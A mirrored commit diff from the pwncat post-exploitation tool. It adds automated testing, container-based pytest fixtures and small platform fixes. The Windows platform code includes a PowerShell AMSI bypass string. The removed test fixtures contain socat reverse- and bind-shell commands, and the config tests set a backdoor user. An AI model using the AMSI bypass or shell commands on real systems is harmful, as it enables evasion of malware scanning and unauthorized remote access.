mirror of
https://github.com/calebstewart/pwncat.git
synced 2024-11-23 09:05:37 +01:00
Working on automated testing
Added a test workflow. Only for triggering manually for now.
This commit is contained in:
parent
0046bd4c60
commit
b998470297
2
.flake8
2
.flake8
@ -1,3 +1,3 @@
|
||||
[flake8]
|
||||
ignore=E501,E123,E121,E126,E133,W505,W503,W504
|
||||
exclude=.git,__pycache__,pwncat.egg-info,env,dist,build,data,docs
|
||||
exclude=.git,__pycache__,pwncat.egg-info,env,dist,build,data,docs,tests
|
||||
|
35
.github/workflows/python.yml
vendored
Normal file
35
.github/workflows/python.yml
vendored
Normal file
@ -0,0 +1,35 @@
|
||||
name: Python Checks
|
||||
on:
|
||||
push:
|
||||
branches: ["main"]
|
||||
pull_request:
|
||||
branches: ["main"]
|
||||
release:
|
||||
types: ["created"]
|
||||
workflow_dispatch:
|
||||
|
||||
jobs:
|
||||
testing:
|
||||
|
||||
runs-on: ubuntu-latest
|
||||
strategy:
|
||||
matrix:
|
||||
python-versions: [3.8,3.9]
|
||||
|
||||
steps:
|
||||
- uses: actions/checkout@v2
|
||||
- name: Set up Python ${{ matrix.python-version }}
|
||||
uses: actions/setup-python@v2
|
||||
with:
|
||||
python-version: ${{ matrix.python-version }}
|
||||
- name: Install pwncat
|
||||
run: |
|
||||
python -m pip install --upgrade pip
|
||||
pip install flake8 pytest
|
||||
pip install -r requirements.txt
|
||||
# - name: Lint with flake8
|
||||
# run: |
|
||||
# flake8
|
||||
- name: Test with pytest
|
||||
run: |
|
||||
pytest
|
@ -336,7 +336,7 @@ class Channel(ABC):
|
||||
|
||||
# Check if we have timed out
|
||||
if time.time() >= time_end:
|
||||
raise ChannelTimeout(data)
|
||||
raise ChannelTimeout(self, data)
|
||||
|
||||
next_byte = self.recv(1)
|
||||
|
||||
|
@ -5,8 +5,8 @@ import fcntl
|
||||
import socket
|
||||
from typing import Optional
|
||||
|
||||
from pwncat.util import console
|
||||
from rich.progress import Progress, BarColumn
|
||||
|
||||
from pwncat.channel import Channel, ChannelError, ChannelClosed
|
||||
|
||||
|
||||
@ -100,6 +100,7 @@ class Socket(Channel):
|
||||
data = b""
|
||||
|
||||
try:
|
||||
data = data + self.client.recv(count)
|
||||
return data + self.client.recv(count)
|
||||
except socket.error as exc:
|
||||
if exc.args[0] == errno.EAGAIN or exc.args[0] == errno.EWOULDBLOCK:
|
||||
|
File diff suppressed because one or more lines are too long
@ -293,6 +293,8 @@ class Session:
|
||||
while self.layers:
|
||||
self.layers.pop()(self)
|
||||
|
||||
self.platform.exit()
|
||||
|
||||
self.platform.channel.close()
|
||||
|
||||
self.died()
|
||||
@ -314,7 +316,7 @@ class Manager:
|
||||
sessions, and executing modules.
|
||||
"""
|
||||
|
||||
def __init__(self, config: str = "./pwncatrc"):
|
||||
def __init__(self, config: str = None):
|
||||
self.config = Config()
|
||||
self.sessions: List[Session] = []
|
||||
self.modules: Dict[str, pwncat.modules.BaseModule] = {}
|
||||
@ -377,6 +379,9 @@ class Manager:
|
||||
except (FileNotFoundError, PermissionError):
|
||||
pass
|
||||
|
||||
if self.db is None:
|
||||
self.open_database()
|
||||
|
||||
def __enter__(self):
|
||||
"""Begin manager context tracking"""
|
||||
|
||||
|
@ -526,6 +526,10 @@ class Platform(ABC):
|
||||
"""Retrieve a string describing the platform connection"""
|
||||
return str(self.channel)
|
||||
|
||||
@abstractmethod
|
||||
def exit(self):
|
||||
""" Exit this session """
|
||||
|
||||
@abstractmethod
|
||||
def refresh_uid(self) -> Union[int, str]:
|
||||
""" Refresh the cached UID of the current session. """
|
||||
|
@ -106,7 +106,10 @@ class PopenLinux(pwncat.subprocess.Popen):
|
||||
return self.returncode
|
||||
|
||||
if self.stdin is not None:
|
||||
self.stdin.flush()
|
||||
try:
|
||||
self.stdin.flush()
|
||||
except ValueError:
|
||||
pass
|
||||
|
||||
# This gets a 'lil... funky... Normally, the ChannelFile
|
||||
# wraps a non-blocking socket in a blocking file object
|
||||
@ -525,6 +528,11 @@ class Linux(Platform):
|
||||
|
||||
self.refresh_uid()
|
||||
|
||||
def exit(self):
|
||||
""" Exit this session """
|
||||
|
||||
self.channel.send(b"exit\n")
|
||||
|
||||
def disable_history(self):
|
||||
"""Disable shell history"""
|
||||
|
||||
@ -560,7 +568,7 @@ class Linux(Platform):
|
||||
]
|
||||
)
|
||||
if python_path is not None:
|
||||
pty_command = f""" exec {python_path} -c "import pty; pty.spawn('{shell} -i')" 2>&1\n"""
|
||||
pty_command = f""" exec {python_path} -c "import pty; pty.spawn('{shell}')" 2>&1\n"""
|
||||
|
||||
if pty_command is not None:
|
||||
self.logger.info(pty_command.rstrip("\n"))
|
||||
@ -576,6 +584,16 @@ class Linux(Platform):
|
||||
# When starting a pty, history is sometimes re-enabled
|
||||
self.disable_history()
|
||||
|
||||
# Ensure that the TTY settings make sense
|
||||
self.Popen(
|
||||
[
|
||||
"stty",
|
||||
"400:1:bf:8a33:3:1c:7f:15:4:0:1:0:11:13:1a:0:12:f:17:16:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0:0",
|
||||
],
|
||||
stdin=subprocess.PIPE,
|
||||
stdout=subprocess.PIPE,
|
||||
).wait()
|
||||
|
||||
return
|
||||
|
||||
raise PlatformError("no avialable pty methods")
|
||||
@ -1107,7 +1125,7 @@ class Linux(Platform):
|
||||
):
|
||||
try:
|
||||
payload, input_data, exit_cmd = method.build(
|
||||
gtfo=self.gtfo, lfile=path, suid=True, length=1000000
|
||||
gtfo=self.gtfo, lfile=path, suid=True
|
||||
)
|
||||
break
|
||||
except MissingBinary:
|
||||
@ -1136,7 +1154,7 @@ class Linux(Platform):
|
||||
):
|
||||
try:
|
||||
payload, input_data, exit_cmd = method.build(
|
||||
gtfo=self.gtfo, lfile=path, suid=True, length=1000000
|
||||
gtfo=self.gtfo, lfile=path, suid=True
|
||||
)
|
||||
break
|
||||
except MissingBinary:
|
||||
|
@ -591,9 +591,12 @@ function prompt {
|
||||
self.host_uuid = self.channel.recvline().strip().decode("utf-8")
|
||||
|
||||
# Bypass AMSI
|
||||
self.powershell(
|
||||
"""$am = ([Ref].Assembly.GetTypes() | % { If ( $_.Name -like "*iUtils" ){$_} })[0];$con = ($am.GetFields('NonPublic,Static') | % { If ( $_.Name -like "*Context" ){$_} })[0];$addr = $con.GetValue($null);[IntPtr]$ptr = $addr;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);"""
|
||||
)
|
||||
try:
|
||||
self.powershell(
|
||||
"""$am = ([Ref].Assembly.GetTypes() | % { If ( $_.Name -like "*iUtils" ){$_} })[0];$con = ($am.GetFields('NonPublic,Static') | % { If ( $_.Name -like "*Context" ){$_} })[0];$addr = $con.GetValue($null);[IntPtr]$ptr = $addr;[Int32[]]$buf = @(0); if( $ptr -ne $null -and $ptr -ne 0 ) { [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1); }"""
|
||||
)
|
||||
except PowershellError as exc:
|
||||
self.session.log("[yellow]warning[/yellow]: failed to disable AMSI!")
|
||||
|
||||
def get_pty(self):
|
||||
""" We don't need to do this for windows """
|
||||
@ -830,11 +833,8 @@ function prompt {
|
||||
def refresh_uid(self):
|
||||
""" Retrieve the current user ID """
|
||||
|
||||
self.powershell(
|
||||
"Add-Type -AssemblyName System.DirectoryServices.AccountManagement"
|
||||
)
|
||||
self.user_info = self.powershell(
|
||||
"([System.DirectoryServices.AccountManagement.UserPrincipal]::Current).SID.Value"
|
||||
"[System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value"
|
||||
)[0]
|
||||
|
||||
def getuid(self):
|
||||
|
25
run-tests.sh
Executable file
25
run-tests.sh
Executable file
@ -0,0 +1,25 @@
|
||||
#!/bin/sh
|
||||
## Run pytest for pwncat. This script will start up the needed
|
||||
## containers locally and then kick off pytest, pointing at the
|
||||
## containers.
|
||||
|
||||
echo "[!] we can only test centos and ubuntu locally"
|
||||
|
||||
CENTOS_CONTAINER=$(podman run --rm -d -p :22 -p :4444 -p :9999 -t calebjstewart/pwncat-testing:centos)
|
||||
echo "[+] started centos container: $CENTOS_CONTAINER"
|
||||
UBUNTU_CONTAINER=$(podman run --rm -d -p :22 -p :4444 -p :9999 -t calebjstewart/pwncat-testing:ubuntu)
|
||||
echo "[+] started centos container: $UBUNTU_CONTAINER"
|
||||
|
||||
CENTOS_BIND_PORT=$(podman inspect "$CENTOS_CONTAINER" | jq -r '.[0].HostConfig.PortBindings["4444/tcp"][0].HostPort')
|
||||
UBUNTU_BIND_PORT=$(podman inspect "$UBUNTU_CONTAINER" | jq -r '.[0].HostConfig.PortBindings["4444/tcp"][0].HostPort')
|
||||
|
||||
echo "[+] centos bind port: $CENTOS_BIND_PORT"
|
||||
echo "[+] ubuntu bind port: $UBUNTU_BIND_PORT"
|
||||
|
||||
CENTOS_HOST="127.0.0.1" CENTOS_BIND_PORT=$CENTOS_BIND_PORT UBUNTU_HOST="127.0.0.1" UBUNTU_BIND_PORT=$UBUNTU_BIND_PORT \
|
||||
pytest
|
||||
|
||||
podman container kill "$CENTOS_CONTAINER"""
|
||||
echo "[+] killed centos container"
|
||||
podman container kill "$UBUNTU_CONTAINER"
|
||||
echo "[+] killed ubuntu container"
|
@ -1,277 +1,103 @@
|
||||
#!/usr/bin/env python3
|
||||
import dataclasses
|
||||
import os
|
||||
import time
|
||||
import random
|
||||
import socket
|
||||
import string
|
||||
import time
|
||||
import os
|
||||
import dataclasses
|
||||
from io import StringIO
|
||||
|
||||
import digitalocean
|
||||
import pytest
|
||||
import digitalocean
|
||||
from xprocess import ProcessStarter
|
||||
from pwncat.channel import ChannelError
|
||||
from Crypto.PublicKey import RSA
|
||||
|
||||
# Test multiple shells
|
||||
SHELLS = ["/bin/sh", "/bin/bash", "/usr/bin/dash", "/usr/bin/zsh"]
|
||||
PLATFORM_MAP = {"ubuntu": "linux", "centos": "linux", "windows": "windows"}
|
||||
|
||||
|
||||
class LinuxReverseStarter(ProcessStarter):
|
||||
""" Start an infinite linux reverse shell using socat """
|
||||
def connection_details_for(name):
|
||||
"""Get connection details from environment for the given
|
||||
host type name (e.g. ubuntu, centos, windows)"""
|
||||
|
||||
name = "linux_reverse"
|
||||
pattern = "READY"
|
||||
args = [
|
||||
"/bin/sh",
|
||||
"-c",
|
||||
"echo READY; socat TCP4:127.0.0.1:{port},retry,forever,fork EXEC:{shell}",
|
||||
]
|
||||
timeout = 5
|
||||
if name not in PLATFORM_MAP:
|
||||
pytest.skip(f"{name} is not a known target")
|
||||
|
||||
@classmethod
|
||||
def get_connection_details(cls):
|
||||
""" Custom method to provide connection details across all starters """
|
||||
if (
|
||||
f"{name.upper()}_HOST" not in os.environ
|
||||
or f"{name.upper()}_BIND_PORT" not in os.environ
|
||||
):
|
||||
pytest.skip(f"{name} not available")
|
||||
|
||||
return {
|
||||
"platform": "linux",
|
||||
"host": "127.0.0.1",
|
||||
"port": cls.port,
|
||||
"protocol": "bind",
|
||||
}
|
||||
|
||||
def startup_check(self):
|
||||
|
||||
details = self.get_connection_details()
|
||||
|
||||
# with socket.create_server(
|
||||
# (details["host"], details["port"]), reuse_port=True
|
||||
# ) as sock:
|
||||
# client = sock.accept()
|
||||
|
||||
return True
|
||||
return {
|
||||
"platform": PLATFORM_MAP[name],
|
||||
"host": os.environ[f"{name.upper()}_HOST"],
|
||||
"port": int(os.environ[f"{name.upper()}_BIND_PORT"]),
|
||||
"protocol": "connect",
|
||||
}
|
||||
|
||||
|
||||
class LinuxBindStarter(ProcessStarter):
|
||||
""" Start an infinite linux bind shell using socat """
|
||||
|
||||
name = "linux_bind"
|
||||
pattern = "READY"
|
||||
args = [
|
||||
"/bin/sh",
|
||||
"-c",
|
||||
"echo READY; socat TCP4-LISTEN:{port},bind=127.0.0.1,reuseaddr,fork EXEC:{shell}",
|
||||
]
|
||||
timeout = 5
|
||||
|
||||
@classmethod
|
||||
def get_connection_details(cls):
|
||||
""" Return connection details for this method """
|
||||
|
||||
return {
|
||||
"platform": "linux",
|
||||
"host": "127.0.0.1",
|
||||
"port": cls.port,
|
||||
"protocol": "connect",
|
||||
}
|
||||
|
||||
def startup_check(self):
|
||||
|
||||
details = self.get_connection_details()
|
||||
|
||||
with socket.create_connection((details["host"], details["port"])) as sock:
|
||||
pass
|
||||
|
||||
return True
|
||||
@pytest.fixture(params=["ubuntu", "centos"])
|
||||
def linux_details(request):
|
||||
""" Get available connection details for linux hosts """
|
||||
return connection_details_for(request.param)
|
||||
|
||||
|
||||
class LinuxFixtureParam(str):
|
||||
"""This is a hack to get the names of parameterized fixtures
|
||||
to have meaning beyond "0", "1", "2", etc. Basically, we create
|
||||
a new sublass of string, and apply a constant value which we want
|
||||
to be the name of the parameterized fixture. We also assign members
|
||||
which contain the process starter and shell path for access by the
|
||||
fixture itself."""
|
||||
|
||||
def __new__(cls, starter, shell):
|
||||
obj = str.__new__(cls, f"{starter.name}_{os.path.basename(shell)}")
|
||||
obj.__init__(starter, shell)
|
||||
return obj
|
||||
|
||||
def __init__(self, starter, shell):
|
||||
self.starter = starter
|
||||
self.shell = shell
|
||||
@pytest.fixture(params=["windows"])
|
||||
def windows_details(request):
|
||||
""" Get available connection details for windows hosts """
|
||||
return connection_details_for(request.param)
|
||||
|
||||
|
||||
def LinuxEnumShells(starter):
|
||||
return [LinuxFixtureParam(starter, shell) for shell in SHELLS]
|
||||
def session_for(request):
|
||||
|
||||
# Grab details for this target
|
||||
details = connection_details_for(request.param)
|
||||
|
||||
@pytest.fixture(
|
||||
params=[
|
||||
*LinuxEnumShells(LinuxReverseStarter),
|
||||
*LinuxEnumShells(LinuxBindStarter),
|
||||
]
|
||||
)
|
||||
def linux(xprocess, request):
|
||||
""" Create linux connections available to the pwncat tests """
|
||||
# Check if there are manager arguments
|
||||
manager_args = getattr(
|
||||
request.node.get_closest_marker("manager_config"), "args", {}
|
||||
)
|
||||
if not manager_args:
|
||||
manager_args = {}
|
||||
|
||||
class Starter(request.param.starter):
|
||||
shell = request.param.shell
|
||||
args = request.param.starter.args
|
||||
|
||||
# We need to make a copy of the args array, and assign the port
|
||||
# outside of the class definition to ensure we don't modify the
|
||||
# class of other fixture parameters by mistake.
|
||||
Starter.args = request.param.starter.args[:].copy()
|
||||
Starter.port = random.randint(30000, 60000)
|
||||
Starter.args[-1] = Starter.args[-1].format(port=Starter.port, shell=Starter.shell)
|
||||
|
||||
logfile = xprocess.ensure(str(request.param), Starter)
|
||||
|
||||
yield Starter.get_connection_details()
|
||||
|
||||
xprocess.getinfo(str(request.param)).terminate()
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def session(linux):
|
||||
if "config" not in manager_args:
|
||||
manager_args["config"] = StringIO(
|
||||
"""
|
||||
set -g db "memory://"
|
||||
"""
|
||||
)
|
||||
|
||||
import pwncat.manager
|
||||
|
||||
with pwncat.manager.Manager(config=None) as manager:
|
||||
session = manager.create_session(**linux)
|
||||
yield session
|
||||
|
||||
|
||||
@dataclasses.dataclass
|
||||
class DigitalOceanFixture(object):
|
||||
""" Digital Ocean Fixture Data """
|
||||
|
||||
ubuntu: digitalocean.Droplet
|
||||
""" Ubuntu 20.04 droplet instance """
|
||||
centos: digitalocean.Droplet
|
||||
""" CentOS 7 droplet instance """
|
||||
windows: digitalocean.Droplet
|
||||
""" Windows droplet instance """
|
||||
|
||||
user: str
|
||||
""" Username for initial access """
|
||||
password: str
|
||||
""" Password for initial access """
|
||||
ssh_key: str
|
||||
""" SSH private key used for auth to Linux servers """
|
||||
bind_port: int
|
||||
""" Port where shells are bound on the given servers """
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def digital_ocean():
|
||||
""" Construct digital ocean targets for remote testing """
|
||||
|
||||
manager = digitalocean.Manager()
|
||||
project = [p for p in manager.get_all_projects() if p.name == "pwncat"][0]
|
||||
unique_name = "test-" + "".join(
|
||||
random.choices(list(string.ascii_letters + string.digits), k=5)
|
||||
)
|
||||
|
||||
key = RSA.generate(2048)
|
||||
pubkey = key.publickey()
|
||||
|
||||
droplets = []
|
||||
keys = []
|
||||
|
||||
try:
|
||||
|
||||
# Create the key
|
||||
do_key = digitalocean.SSHKey(
|
||||
name=unique_name, public_key=pubkey.exportKey("OpenSSH").decode("utf-8")
|
||||
)
|
||||
do_key.create()
|
||||
keys.append(do_key)
|
||||
|
||||
# Create ubuntu vm
|
||||
ubuntu = digitalocean.Droplet(
|
||||
name=unique_name + "-ubuntu",
|
||||
region="nyc1",
|
||||
image="ubuntu-20-04-x64",
|
||||
size_slug="s-1vcpu-1gb",
|
||||
ssh_keys=[do_key],
|
||||
backups=False,
|
||||
)
|
||||
ubuntu.create()
|
||||
droplets.append(ubuntu)
|
||||
|
||||
# Create centos vm
|
||||
centos = digitalocean.Droplet(
|
||||
name=unique_name + "-ubuntu",
|
||||
region="nyc1",
|
||||
image="ubuntu-20-04-x64",
|
||||
size_slug="s-1vcpu-1gb",
|
||||
ssh_keys=[do_key],
|
||||
backups=False,
|
||||
)
|
||||
centos.create()
|
||||
droplets.append(centos)
|
||||
|
||||
# Create windows vm
|
||||
windows = digitalocean.Droplet(
|
||||
name=unique_name + "-ubuntu",
|
||||
region="nyc1",
|
||||
image="ubuntu-20-04-x64",
|
||||
size_slug="s-1vcpu-1gb",
|
||||
ssh_keys=[do_key],
|
||||
backups=False,
|
||||
)
|
||||
windows.create()
|
||||
droplets.append(windows)
|
||||
|
||||
# Add tag to droplets
|
||||
tag = digitalocean.Tag(name=unique_name)
|
||||
tag.create()
|
||||
tag.add_droplets([ubuntu.id, windows.id, centos.id])
|
||||
|
||||
# Wait for droplets to be up
|
||||
waiting_droplets = droplets.copy()
|
||||
while waiting_droplets:
|
||||
for droplet in waiting_droplets:
|
||||
actions = droplet.get_actions()
|
||||
for action in droplet.get_actions():
|
||||
action.load()
|
||||
if action.status != "completed":
|
||||
break
|
||||
else:
|
||||
droplet.load()
|
||||
waiting_droplets.remove(droplet)
|
||||
break
|
||||
time.sleep(1)
|
||||
time.sleep(5)
|
||||
|
||||
# Wait for SSH to be up on the droplets
|
||||
while True:
|
||||
for droplet in droplets:
|
||||
try:
|
||||
with socket.create_connection((droplet.ip_address, 22)) as sock:
|
||||
pass
|
||||
except socket.error:
|
||||
break
|
||||
else:
|
||||
with pwncat.manager.Manager(**manager_args) as manager:
|
||||
for i in range(3):
|
||||
try:
|
||||
session = manager.create_session(**details)
|
||||
yield session
|
||||
break
|
||||
time.sleep(5)
|
||||
except ChannelError:
|
||||
# This seems to be because of the contaiener setup, so we just add
|
||||
# a little sleep in
|
||||
time.sleep(2)
|
||||
else:
|
||||
raise Exception("failed to connect to container")
|
||||
|
||||
yield DigitalOceanFixture(
|
||||
ubuntu=ubuntu,
|
||||
centos=centos,
|
||||
windows=windows,
|
||||
user="root",
|
||||
password="wrong",
|
||||
ssh_key=key,
|
||||
bind_port=0,
|
||||
)
|
||||
|
||||
finally:
|
||||
@pytest.fixture(params=["windows", "ubuntu", "centos"])
|
||||
def session(request):
|
||||
""" Start a session with any platform """
|
||||
yield from session_for(request)
|
||||
|
||||
for droplet in manager.get_all_droplets(tag_name=unique_name):
|
||||
droplet.destroy()
|
||||
|
||||
for do_key in manager.get_all_sshkeys():
|
||||
if do_key.name == unique_name:
|
||||
do_key.destroy()
|
||||
@pytest.fixture(params=["windows"])
|
||||
def windows(request):
|
||||
""" Start a windows session """
|
||||
yield from session_for(request)
|
||||
|
||||
|
||||
@pytest.fixture(params=["ubuntu", "centos"])
|
||||
def linux(request):
|
||||
""" Start a linux session """
|
||||
|
||||
yield from session_for(request)
|
||||
|
@ -1,171 +1,43 @@
|
||||
#!/usr/bin/env python3
|
||||
import os
|
||||
import base64
|
||||
import subprocess
|
||||
|
||||
import pytest
|
||||
from pwncat.util import random_string
|
||||
|
||||
|
||||
def test_file_read_printable(session, tmp_path):
|
||||
""" Test abstracted linux path interaction """
|
||||
def test_file_read_write(session):
|
||||
""" Test file read/write of printable data """
|
||||
|
||||
# Printable data to read from a file
|
||||
expected_contents = base64.b64encode(os.urandom(4096)).decode("utf-8")
|
||||
contents = os.urandom(1024)
|
||||
with session.platform.tempfile(mode="wb") as filp:
|
||||
filp.write(contents)
|
||||
path = filp.name
|
||||
|
||||
# Write to a temporary file
|
||||
with (tmp_path / "test").open("w") as filp:
|
||||
filp.write(expected_contents)
|
||||
assert session.platform.Path(path).exists()
|
||||
|
||||
# Attempt to read through linux session
|
||||
with (session.platform.Path(str(tmp_path)) / "test").open("r") as filp:
|
||||
contents = filp.read()
|
||||
|
||||
# Ensure match
|
||||
assert contents == expected_contents
|
||||
with session.platform.open(path, "rb") as filp:
|
||||
assert contents == filp.read()
|
||||
|
||||
|
||||
def test_file_read_binary(session, tmp_path):
|
||||
""" Test abstract linux path read for binary data """
|
||||
def test_platform_mkdir(session):
|
||||
""" Test creating a directory """
|
||||
|
||||
# Generate unique random data
|
||||
expected_contents = os.urandom(8192)
|
||||
path = session.platform.Path(random_string())
|
||||
|
||||
with (tmp_path / "test").open("wb") as filp:
|
||||
filp.write(expected_contents)
|
||||
|
||||
with (session.platform.Path(str(tmp_path)) / "test").open("rb") as filp:
|
||||
contents = filp.read()
|
||||
|
||||
assert contents == expected_contents
|
||||
path.mkdir()
|
||||
assert session.platform.Path(str(path)).is_dir()
|
||||
|
||||
|
||||
def test_file_write_printable(session, tmp_path):
|
||||
""" Test abstract file-write w/ printable data """
|
||||
def test_platform_run(session):
|
||||
|
||||
# Printable data to write to a file
|
||||
expected_contents = base64.b64encode(os.urandom(4096)).decode("utf-8")
|
||||
# Ensure command output works
|
||||
output_remote = session.platform.run(
|
||||
["echo", "hello world"], capture_output=True, text=True, check=True
|
||||
)
|
||||
assert output_remote.stdout == "hello world\n"
|
||||
|
||||
# Write to a temporary file
|
||||
with (session.platform.Path(str(tmp_path)) / "test").open("w") as filp:
|
||||
filp.write(expected_contents)
|
||||
|
||||
# Attempt to read through linux session
|
||||
with (tmp_path / "test").open("r") as filp:
|
||||
contents = filp.read()
|
||||
|
||||
# Ensure match
|
||||
assert contents == expected_contents
|
||||
|
||||
|
||||
def test_file_write_binary(session, tmp_path):
|
||||
""" Test abstract file-write w/ binary data """
|
||||
|
||||
# data to write to a file
|
||||
expected_contents = os.urandom(8192)
|
||||
|
||||
# Write to a temporary file
|
||||
with (session.platform.Path(str(tmp_path)) / "test").open("wb") as filp:
|
||||
filp.write(expected_contents)
|
||||
|
||||
# Attempt to read through linux session
|
||||
with (tmp_path / "test").open("rb") as filp:
|
||||
contents = filp.read()
|
||||
|
||||
# Ensure match
|
||||
assert contents == expected_contents
|
||||
|
||||
|
||||
def test_file_stat(session, tmp_path):
|
||||
""" Test various stat routines """
|
||||
|
||||
dir_path = tmp_path / "directory"
|
||||
dir_path.mkdir(exist_ok=True, parents=True)
|
||||
|
||||
file_path = dir_path / "file"
|
||||
file_path.touch()
|
||||
|
||||
symlink_path = dir_path / "symlink"
|
||||
symlink_path.symlink_to(file_path)
|
||||
|
||||
# NOTE - this doesn't work on real python, and I'm not sure why... :sob:
|
||||
# link_path = dir_path / "link"
|
||||
# link_path.link_to(file_path)
|
||||
|
||||
dir_path = session.platform.Path(str(dir_path))
|
||||
file_path = session.platform.Path(str(file_path))
|
||||
|
||||
# Ensure appropriate properties
|
||||
assert dir_path.is_dir()
|
||||
assert not dir_path.is_file()
|
||||
assert not dir_path.is_mount()
|
||||
assert not dir_path.is_symlink()
|
||||
assert not dir_path.is_socket()
|
||||
assert not dir_path.is_fifo()
|
||||
assert not dir_path.is_block_device()
|
||||
assert not dir_path.is_char_device()
|
||||
|
||||
# Ensure appropriate file properties
|
||||
assert file_path.is_file()
|
||||
assert not file_path.is_dir()
|
||||
assert not file_path.is_mount()
|
||||
assert not file_path.is_symlink()
|
||||
assert not file_path.is_socket()
|
||||
assert not file_path.is_fifo()
|
||||
assert not file_path.is_block_device()
|
||||
assert not file_path.is_char_device()
|
||||
|
||||
# Ensure symlink properties are correct
|
||||
assert symlink_path.is_file()
|
||||
assert not symlink_path.is_dir()
|
||||
assert not symlink_path.is_mount()
|
||||
assert symlink_path.is_symlink()
|
||||
assert not symlink_path.is_socket()
|
||||
assert not symlink_path.is_fifo()
|
||||
assert not symlink_path.is_block_device()
|
||||
assert not symlink_path.is_char_device()
|
||||
|
||||
# Ensure link properties are correct
|
||||
# See above note on why this is commented...
|
||||
# assert link_path.is_file()
|
||||
# assert not link_path.is_dir()
|
||||
# assert not link_path.is_mount()
|
||||
# assert not link_path.is_symlink()
|
||||
# assert not link_path.is_socket()
|
||||
# assert not link_path.is_fifo()
|
||||
# assert not link_path.is_block_device()
|
||||
# assert not link_path.is_char_device()
|
||||
|
||||
# Ensure iterdir works
|
||||
assert str(file_path) in [str(item) for item in dir_path.iterdir()]
|
||||
|
||||
# link_path.unlink()
|
||||
symlink_path.unlink()
|
||||
assert not (dir_path / "symlink").exists()
|
||||
|
||||
file_path.unlink()
|
||||
assert not (dir_path / "file").exists()
|
||||
|
||||
dir_path.rmdir()
|
||||
assert not (session.platform.Path(tmp_path) / "directory").exists()
|
||||
|
||||
# Ensure mount point is correct
|
||||
assert session.platform.Path("/").is_mount()
|
||||
|
||||
|
||||
def test_file_creation(session, tmp_path):
|
||||
""" Test various file creation methods """
|
||||
|
||||
remote_path = session.platform.Path(tmp_path)
|
||||
|
||||
# Create a directory
|
||||
(remote_path / "directory").mkdir()
|
||||
assert (remote_path / "directory").is_dir()
|
||||
|
||||
# Remove directory
|
||||
(remote_path / "directory").rmdir()
|
||||
assert not (remote_path / "directory").is_dir()
|
||||
|
||||
# Touch a file
|
||||
(remote_path / "file").touch()
|
||||
assert (remote_path / "file").is_file()
|
||||
|
||||
# Delete file
|
||||
(remote_path / "file").unlink()
|
||||
assert not (remote_path / "file").is_file()
|
||||
# Ensure we capture the process return code properly
|
||||
with pytest.raises(subprocess.CalledProcessError):
|
||||
session.platform.run("this_command_doesnt_exist", shell=True, check=True)
|
||||
|
@ -2,15 +2,3 @@
|
||||
import subprocess
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
def test_linux_popen(session):
|
||||
|
||||
# Ensure command output works
|
||||
id_output_local = subprocess.run(["id"], capture_output=True, text=True)
|
||||
id_output_remote = session.platform.run(["id"], capture_output=True, text=True)
|
||||
assert id_output_local.stdout == id_output_remote.stdout
|
||||
|
||||
# Ensure we capture the process return code properly
|
||||
with pytest.raises(subprocess.CalledProcessError):
|
||||
session.platform.run("echo something | grep nothing", shell=True, check=True)
|
||||
|
@ -8,7 +8,7 @@ def test_config_fileobj():
|
||||
|
||||
configuration = io.StringIO(
|
||||
"""
|
||||
set -g db "sqlite://:memory:"
|
||||
set -g db "memory://"
|
||||
set -g prefix c-k
|
||||
set -g on_load { }
|
||||
set -g backdoor_user "config_test"
|
||||
@ -35,11 +35,9 @@ def test_user_config(tmp_path):
|
||||
|
||||
# Create our user configuration
|
||||
with (tmp_path / "pwncat" / "pwncatrc").open("w") as filp:
|
||||
filp.write(
|
||||
"""
|
||||
set -g backdoor_user "config_test"
|
||||
"""
|
||||
)
|
||||
filp.writelines(["""set -g backdoor_user "config_test"\n"""])
|
||||
|
||||
os.chdir(tmp_path)
|
||||
|
||||
# Create a manager object with default config to load our
|
||||
# user configuration.
|
||||
@ -51,29 +49,3 @@ set -g backdoor_user "config_test"
|
||||
os.environ["XDG_DATA_HOME"] = old_home
|
||||
else:
|
||||
del os.environ["XDG_DATA_HOME"]
|
||||
|
||||
|
||||
def test_multisession(linux):
|
||||
|
||||
# Create a manager with the default configuration
|
||||
with pwncat.manager.Manager(config=None) as manager:
|
||||
|
||||
# Connect to the target twice to get two sessions
|
||||
session1 = manager.create_session(**linux)
|
||||
session2 = manager.create_session(**linux)
|
||||
|
||||
# Ensure both sessions are tracked
|
||||
assert len(manager.sessions) == 2
|
||||
|
||||
# Ensure they match what was returned by create_session
|
||||
assert session1 in manager.sessions
|
||||
assert session2 in manager.sessions
|
||||
|
||||
# Ensure creating a session sets the current target
|
||||
assert manager.target == session2
|
||||
|
||||
# Switch targets
|
||||
manager.target = session1
|
||||
|
||||
# Ensure we are now tracking the expected target
|
||||
assert manager.target == session1
|
||||
|
@ -3,22 +3,3 @@ import io
|
||||
|
||||
import pytest
|
||||
import paramiko
|
||||
|
||||
|
||||
def test_digitalocean(digital_ocean):
|
||||
|
||||
key = paramiko.rsakey.RSAKey.from_private_key(
|
||||
io.StringIO(digital_ocean.ssh_key.exportKey("PEM").decode("utf-8"))
|
||||
)
|
||||
|
||||
ubuntu = digital_ocean.ubuntu
|
||||
ubuntu.load()
|
||||
|
||||
client = paramiko.client.SSHClient()
|
||||
client.load_system_host_keys()
|
||||
client.set_missing_host_key_policy(paramiko.client.AutoAddPolicy)
|
||||
client.connect(ubuntu.ip_address, username=digital_ocean.user, pkey=key)
|
||||
|
||||
stdin, stdout, stderr = client.exec_command("whoami")
|
||||
|
||||
assert stdout.read().strip().decode("utf-8") == "root"
|
||||
|
Loading…
Reference in New Issue
Block a user